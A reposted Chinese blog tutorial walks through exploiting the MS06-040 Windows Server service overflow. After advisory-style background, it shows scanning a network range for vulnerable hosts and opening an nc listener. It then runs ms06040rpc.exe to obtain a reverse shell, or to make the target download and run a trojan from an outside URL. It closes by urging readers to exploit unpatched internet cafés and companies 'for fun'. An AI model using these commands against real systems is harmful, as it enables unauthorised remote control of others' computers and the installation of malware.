zoukankan      html  css  js  c++  java
  • 【转】基于溢出的入侵

    背景                                                                                                                                                                

      Ms06040(Server服务中的缓冲区溢出漏洞)是继ms06035以后的又一个重大漏洞,利用此漏洞的魔波蠕虫已经开始蔓延,相信互连网又会因此掀起血雨腥风。

      此漏洞的影响范围有多大?

        这是一个远程执行代码漏洞。 成功利用此漏洞的攻击者可以远程完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

      造成漏洞的原因是什么?

        Server 服务中未经检查的缓冲区。

      什么是 Server 服务?

        Server 服务通过网络提供 RPC 支持和文件打印支持以及命名管道共享。 Server 服务允许共享您的本地资源(例如磁盘和打印机),以便网络上的其他用户可以访问。 它还允许在其他计算机和您的计算机上运行的应用程序之间进行命名管道通信(用于 RPC)。

      攻击者可能利用此漏洞执行什么操作?

        成功利用此漏洞的攻击者可以完全控制受影响的系统。

      哪些人可能会利用此漏洞?

        任何可向受影响的系统传送特制消息的匿名用户都可以尝试利用此漏洞。

      攻击者能够如何利用此漏洞?

        攻击者可能试图通过创建特制的消息并将其发送到受影响的系统来利用此漏洞。 这样,这些消息可能导致受影响的系统执行代码。

      受此漏洞威胁最大的系统有哪些?

        所有工作站和服务器均受此问题的威胁,其中由于该漏洞的独特特征以及受影响的代码路径,Windows 2000 系统受到的威胁最大。

    实战                                                                                                                                                                

      首先我们弄了个扫描工具:rpc-server Scanner IP地址填入你想扫描的网段,点“扫描全部”。

      现在它已经开始工作了,去喝口水回来,已经全部扫描完毕

        

      看到没,显示Vulnerable的就说明存在漏洞我们来利用,首先在开始运行里打开CMD用nc监听一个端口。

        

      我这输入“Nc –l –vv –p 8888”, 监听8888端口。

      现在我们开始溢出这是它的说明:

        

      

    Usage: ms06040rpc.exe <host> <download url> <os type> ms06040rpc.exe <host> <reverse addr> <revser port> <os type> 
    
      <download url>:
        such as:http://192.168.0.128/test.exe 
      <reverse addr>: your host ip address 
      <reverse port >:your host listenning port
      <os type(1/2)>: 1: win 2000sp4 2:win xpsp1

      方法一:命令:ms06040rpc.exe  攻击的IP   你的IP   反弹端口 系统类型系统类型:“1”就是win 2000sp4“2”就是winxpsp1

          举例:ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1
      方法二:命令:ms06040rpc.exe 你的木马地址系统类型

          举例:ms06040rpc.exe  192.168.209.128 http://www.hackbase.com/muma.exe 1溢出成功后就自动下载http://www.hackbase.com/muma.exe 并且执行

      我们这输入ms06040rpc.exe 192.168.209.128 192.168.137.1 8888 1 192.168.209.128就是我要攻击的IP,192.168.137.1就是我的IP,8888就是我刚才用Nc监听的8888端口

        

      提示发送成功

        

      OK,我们的得到了一个SHELL,可以随心的控制他了

    最后                                                                                                                                                               

      很多人,包括一些大虾们都弄不懂为什么明明XPSP2和2003系统明明说了有漏洞可是不能利用呵呵,告诉大家,其实XPSP2用了DEP技术

      因为DEP能够对各种程序进行监视,阻止病毒在受保护的内存位置运行有害代码。DEP通过处理器的NX(No eXecute)功能,查找内存中没有明确包含可执行代码的数据(这些数据有时会是病毒的源代码),找到这些数据后,NX将它们都标记为“不可执行”。以后如果某程序在内存中,试图执行这些带“不可执行”标记的代码,SP2将会自动关闭该程序。因此,假如你运行了一个已经染毒的软件,DEP就会把病毒代码标记为“不可执行”,这样就能阻止病毒在内存中运行,保护电脑中的文件免受蠕虫、病毒的传染破坏。

      很多朋友犯迷糊了打个比方就是系统给每个合法的应用程序发一张名片,但是溢出程序的原理没有名片,就不能执行明白了吧,哈哈

      很多网吧,很多大公司都有没打补丁请大家小心利用。JUST FOR FUN!

    转载请注明出处:http://www.cnblogs.com/yydcdut/p/3515187.html

  • 相关阅读:
    wince 操作sqlite数据库
    c#数据结构(第二章)
    C#数据结构(第三章)
    近期学习(收藏地址)
    c#数据结构(第四章)
    PowerDesigner 数据库设计
    wince操作远程sqlserver数据库
    一个有趣的算法
    c#数据结构(第一章)
    c#实现显示图片的动态效果
  • 原文地址:https://www.cnblogs.com/yydcdut/p/3515187.html
Copyright © 2011-2022 走看看